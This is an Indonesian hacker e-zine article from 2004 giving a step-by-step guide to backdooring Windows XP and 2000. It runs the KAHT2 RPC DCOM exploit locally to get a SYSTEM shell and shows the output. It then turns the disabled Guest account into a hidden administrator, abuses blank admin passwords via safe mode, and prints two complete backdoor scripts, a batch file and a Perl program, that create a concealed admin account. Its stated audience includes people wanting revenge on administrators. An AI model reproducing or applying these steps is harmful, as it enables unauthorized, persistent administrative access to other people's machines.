
	____________________   ___ ___ ________   
	\_   _____/\_   ___ \ /   |   \\_____  \  
	 |    __)_ /    \  \//    ~    \/   |   \ 
	 |        \\     \___\    Y    /    |    \
	/_______  / \______  /\___|_  /\_______  /
	        \/         \/       \/         \/ 


					    .OR.ID
ECHO-ZINE RELEASE
       05

Author: y3dips || y3dips@echo.or.id || y3d1ps@telkom.net
Online @ www.echo.or.id :: http://ezine.echo.or.id


== Backd00ring WINDOS XP && 2000 ==



Pengantar 

	Tulisan ini dibuat untuk membuktikan bahwa sabotase account admin
  	pada windows juga dapat dilakukan secara lokal, bisa dengan 
	menggunakan software yang sama, atau bahkan tanpa software sama sekali
	tulisan ini juga menyambung artikel yang di buat oleh the_day,
 	tetapi di khususkan untuk eksploitasi secara lokal .


artikel ini ditujukan untuk :
- buat yang lupa password admin :p
- buat yang mimpi pengen jadi admin :P
- buat yang dendam sama admin karena di curangin :)
- buat yang mau belajar exploitasi windows
- buat yang mau tau kebobrokan windows
- ..... (isi ndiri, kenapa kamu tertarik baca ini)

bahan yang di perlukan :
	-sploits RPC DCOM : *kaht2 (for windust)
	-atau sploits echokillrpc yang khusus local sploits
	-account user biasa or minimal Guest

dari user biasa :

1. ekstrak kaht2 yang dimiliki, biar mudah taruh aja di C:\
   terus jalankan :
   start > run > command >

   masuk ke c:\ipconfig or kalo males pake ip jaringan bisa pake
   ip buat loopback yaitu 127.0.0.1

   ketik aja:
   c:\kaht2 127.0.0.01 127.0.0.1

   _________________________________________________
           KAHT II - MASSIVE RPC EXPLOIT
   DCOM RPC exploit. Modified by aT4r@3wdesign.es
   #haxorcitos && #localhost  @Efnet Ownz you!!!
              PUBLIC VERSION :P
   ________________________________________________

  [+] Targets: 127.0.0.0-127.0.0.1 with 50 Threads
  [+] Attacking Port: 135. Remote Shell at port: 328
  [+] Scan In Progress...
  - Connecting to 127.0.0.1
    Sending Exploit to a [WinXP] Server...
  - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

2. jalankan echokillrpc.exe

   dapatkan c:\windows\sysem32\


masuk deh :D dengan account Administrator

  sekarang kamu mau ngapain? bikin backdoor aja or mau buat account baru
  admin or jadiin account kamu admin ?

  a. bikin backdoor aja :D
  kalo ini kamu kudu cari account yang gak di aktifkan sehingga user
  tersebut gak terdeteksi pada halaman login user :P
  biasanya account Guest yang dibuat tidak aktif padahal masih ada/default
  nah kamu bisa jadikan ini backdoor kamu , semisal kamu mau remote or
  login biasa :)

  gimana caranya ? belajar :P , just kiddding!

  kamu ketik sintax berikut ini , bair jelasnya kamu liat dulu account guest
  ada apa kagak ? pake sintax net user

  C:\WINDOWS\system32>net user

net user

User accounts for \\

------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
SUPPORT_388945a0         y3dips
The command completed with one or more errors.



	(cat : lihat ada beberapa account yang tercipta di situ dan dapat di
 	  manfaatkan  :P)

   YUPe, ternyata ada account guest, biar jelas apa dia aktif or kagak 
   kita ketik aje     net user Guest

C:\WINDOWS\system32>net user Guest
net user Guest
User name                    Guest
Full Name
Comment                      Built-in account for guest access to the computer/d
omain
User's comment
Country code                 000 (System Default)
Account active               No                      <=====gak aktif :p
Account expires              Never

Password last set            2/29/2004 3:58 AM
Password expires             Never
Password changeable          2/29/2004 3:58 AM
Password required            No
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/29/2004 3:42 AM

Logon hours allowed          All

Local Group Memberships      *Guests
Global Group memberships     *None
The command completed successfully.

  hehehehe, ternyata gak aktif euy..

  sekarang kita jadikan backdoor pake perintah
  
C:\WINDOWS\system32>net localgroup Administrators Guest /add
  
  menjadikan user Guest menjadi group Administrators.

  oke! kelar sudah jika kita perlu sekali-sekali maka tinggal memakai
  account ini, awas jangan sampai di ambil orang lo...
  or mau dikasih password aja, biar lebih asyik :D


   b. buat account sebagai admin

   setelah dapet command prompt sebagai admin hasil dari eksploitasi dengan 
   kaht2 atau echokillrpc, maka tinggal jalankan exploits echobacd00r.bat
   atau echobackd00r.exe yang dapat anda letakkan pada disket atau telah 
   copikan ke C:\Windows\system32\

   sehingga tinggal ketik 
   
   c:\windows\system32\echobacd00r.bat
	
    selesai!!!

    atau jika anda tidak menggunakan echobackd00r.bat atau echobackd00r.exe
    anda dapat mengetikkan secara manual dengan penggunaan net user dan
    net localgroup, untuk detilnya sama seperti pembuatan account admin
    pada artikel the_day tentang hacking windows 2000



2 . Ekploitasi karena kelemahan windust apabila saat installasi gak 
    ngisiin password admin (inget gak!!) 

    cara termudah adalah kamu masuk ke windows, saat booting tekan 
    F8, terus pilih safe mode dengan command prompt
    setelah itu mausk deh ke account admin, :P

    pake command prompt dan perintah net user untuk add user dan 
    pake sintax net localgroup untuk jadikan user tsb admin ..

	cat: terbukti pada beberapa pc yang di install di komputer 
	     tempat bekerja yang ternyata dibiartkan dengan admin yang 
	     tak berpassword :D, 
	     (keasyikan buat click-click duang kali )


3.  Eksploitasi lokal dengan menggunakan :
    1. Disk bootable,+ echobackd00r.bat/echobackd00r.exe (jika ada)
    2. Eksploits kaht2 or echokillrpc

    masukkan disket, 
    apabila  masuk ke command prompt maka silakan eksekusi langsung kaht2nya
    atau echokillrpc.

    
    selanjutnya tinggal modifikasi account yang ada atau ciptakan account baru
    (dapat menggunakan echobackd00r.bat atau secara manual)


    cara ini dilakukan jika cara 1 dan 2 tidak bisa di lakukan
    (cat : cara 1: account user biasa gak ada, cara 2: account admin 
      dengan F8 diberi password)

[perintah net user ]

NET USER
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]

NET USER creates and modifies user accounts on computers. When used
without switches, it lists the user accounts for the computer. The
user account information is stored in the user accounts database.

This command works only on servers.


username     Is the name of the user account to add, delete, modify, or
             view. The name of the user account can have as many as
             20 characters.
password     Assigns or changes a password for the user's account.
             A password must satisfy the minimum length set with the
             /MINPWLEN option of the NET ACCOUNTS command. It can have as
             many as 14 characters.
*            Produces a prompt for the password. The password is not
             displayed when you type it at a password prompt.
/DOMAIN      Performs the operation on a domain controller of
             the current domain.
/ADD         Adds a user account to the user accounts database.
/DELETE      Removes a user account from the user accounts database.

Options      Are as follows:

   Options                    Description
   --------------------------------------------------------------------
   /ACTIVE:{YES | NO}         Activates or deactivates the account. If
                              the account is not active, the user cannot
                              access the server. The default is YES.
   /COMMENT:"text"            Provides a descriptive comment about the
                              user's account (maximum of 48 characters).
                              Enclose the text in quotation marks.
   /COUNTRYCODE:nnn           Uses the operating system country code to
                              implement the specified language files for a
                              user's help and error messages. A value of
                              0 signifies the default country code.
   /EXPIRES:{date | NEVER}    Causes the account to expire if date is
                              set. NEVER sets no time limit on the
                              account. An expiration date is in the
                              form mm/dd/yy or dd/mm/yy, depending on the
                              country code. Months can be a number,
                              spelled out, or abbreviated with three
                              letters. Year can be two or four numbers.
                              Use slashes(/) (no spaces) to separate
                              parts of the date.
   /FULLNAME:"name"           Is a user's full name (rather than a
                              username). Enclose the name in quotation
                              marks.
   /HOMEDIR:pathname          Sets the path for the user's home directory.
                              The path must exist.
   /PASSWORDCHG:{YES | NO}    Specifies whether users can change their
                              own password. The default is YES.
   /PASSWORDREQ:{YES | NO}    Specifies whether a user account must have
                              a password. The default is YES.
   /PROFILEPATH[:path]        Sets a path for the user's logon profile.
   /SCRIPTPATH:pathname       Is the location of the user's logon
                              script.
   /TIMES:{times | ALL}       Is the logon hours. TIMES is expressed as
                              day[-day][,day[-day]],time[-time][,time
                              [-time]], limited to 1-hour increments.
                              Days can be spelled out or abbreviated.
                              Hours can be 12- or 24-hour notation. For
                              12-hour notation, use am, pm, a.m., or
                              p.m. ALL means a user can always log on,
                              and a blank value means a user can never
                              log on. Separate day and time entries with
                              a comma, and separate multiple day and time
                              entries with a semicolon.
   /USERCOMMENT:"text"        Lets an administrator add or change the User
                              Comment for the account.
   /WORKSTATIONS:{computername[,...] | *}
                              Lists as many as eight computers from
                              which a user can log on to the network. If
                              /WORKSTATIONS has no list or if the list is *,
                              the user can log on from any computer.

NET HELP command | MORE displays Help one screen at a time.


 : :berikut di cantumkan 2 buah script backd00r 

   [echobackd00r.bat]

   cut here &<-----------------------------------------------------------



	rem *echobackd00r.bat
	rem *Maret 2004 - backd00r untuk XP && 2000
	rem *dibuat untuk mempermudah menciptakan account admin
	rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
	rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal
	rem *cara pakai, ubah dulu USER="backdoor"
	rem *cara pakai, ubah dulu PASS="password"


	rem *MULAI.

	@echo off
	PROMPT $P$G
	cls
	Color 87
	GOto iklan

	:setting

	 rem *ganti USER dan PASS

	 set USER="backdoor"
 	 set PASS="password"

	 if %USER%=="backdoor" Goto gagal else GOto proses

	:proses

	 rem *masuk ke perintah tuk nambahin user + passwordnya

	 net user %USER% %PASS% /add
	 net localgroup Administrators %USER% /add
	 net localgroup Users %USER% /delete

	 cls
	 echo.
	 echo   Account %USER% dengan password %PASS% telah berhasil di buat!
	 color 70


	 EXIT

	:iklan

	 rem * just a banner from me :) , bisa di hilangkan :p

	 echo.
	 echo  #####################################################
	 echo  #                                                   #
	 echo  #                   Echobackd00r                    #
	 echo  #     dibuat dan di coba oleh y3dips with XP OS     #
	 echo  # greetz to :the_day for idea, moby, z3r0byt3,comex #
	 echo  #              note: ubah USER dan PASS             #
	 echo  #                                                   #
	 echo  #####################################################
	 echo.
	 echo                        tekan ENTER !!!
	 pause>nul

	Goto setting

	:gagal

	 echo.
	 echo       edit file echobackd00r.bat dan ubah USER dan PASSnya
	 echo.


	rem *SELESAI.
	rem *created by y3dips : maret 2004 : http://echo.or.id


	 cut here &<-----------------------------------------------------------




   	[echobackd00r.pl > ubah ke exe dengan perl2exe]

	cut here &<-----------------------------------------------------------


	# echobackd00r.pl digunakan untuk membuat account admin pada Windows XP, 2000
	# kombinasikan dengan sploits RPC DCOM seperti KAHT2 dsb
	# ubah ke exe dengan perl2exe

	#!/usr/bin/perl

    printf"\n  **********************************************************\n";
      print "  *                                                        *\n";
      print "  *                      Echobackd00r                      *\n";
      print "  *   created && tested by y3dips on XP Operating Sys      *\n";
      print "  * greetz : the_day (untuk idenya), moby, comex, z3r0byt3 *\n";
      print "  *          echo-memberz, newbie_hacker, puji_tiwili*     *\n";
      print "  *                                                        *\n";
      printf"  **********************************************************\n\n";

	if(@ARGV == 2)
	{

      	$uname    = $ARGV[0];
      	$password = $ARGV[1];

		{
  	system(" net user $uname $password /add ");
  	system(" net localgroup Administrators $uname /add ");
  	system(" net localgroup Users $uname /delete ");
		}
	}

	else
	{
     	print "   [Gunakan] echobackd00r.exe username password  \n";
	}


	# end.
	# created by y3dips : download from http://echo.or.id


	cut here &<-----------------------------------------------------------




  EOF.


  Penutup.
  tulisan ini tetap seperti tulisan-tulisan terdahulu yang ditujukan 
  untuk pendidikan dan bertujuan untuk membukakan mata kita semua terhadap
  pentingnya security, segala bentuk penyalahgunaan adalah bukan merupakan 
  tanggung jawab penulis .




*greetz to: 
	[echostaff a.k.a moby, the_day, comex ,z3r0byt3], echo memberz,
        anak anak newbie_hacker,$peci@l temen2 seperjuangan 
	
	kirimkan kritik && saran ke y3dips[at]echo.or.id

	*/0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004
